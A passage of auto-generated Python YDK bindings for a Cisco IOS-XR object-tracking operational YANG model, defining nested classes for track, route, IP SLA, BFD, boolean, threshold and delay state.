self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief']['meta_info']
class Tracks(_Entity_):
"""
Object Tracking Track table
.. attribute:: track
Track name \- maximum 32 characters
**type**\: list of :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks, self).__init__()
self.yang_name = "tracks"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track", ("track", ObjectTracking.Tracks.Track))])
self._leafs = OrderedDict()
self.track = YList(self)
self._segment_path = lambda: "tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks, [], name, value)
class Track(_Entity_):
"""
Track name \- maximum 32 characters
.. attribute:: track_name (key)
Track name
**type**\: str
**length:** 1..32
**config**\: False
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track, self).__init__()
self.yang_name = "track"
self.yang_parent_name = "tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['track_name']
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.Tracks.Track.TrackInfo))])
self._leafs = OrderedDict([
('track_name', (YLeaf(YType.str, 'track-name'), ['str'])),
])
self.track_name = None
self.track_info = YList(self)
self._segment_path = lambda: "track" + "[track-name='" + str(self.track_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track, ['track_name'], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.Tracks.Track.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.Tracks.Track.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.Tracks.Track.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.Tracks.Track.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object . In case of a type threshold weight( i.e. weighted sum list), weight is asigned by User at the time of configuration. In case of a type threshold percentage (i.e. percentage based list), weight is internally computed by (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks.Track']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.Tracks']['meta_info']
class TrackTypeIpv4RouteBrief(_Entity_):
"""
Object Tracking Type Ipv4 Route brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief, self).__init__()
self.yang_name = "track-type-ipv4-route-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-ipv4-route-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
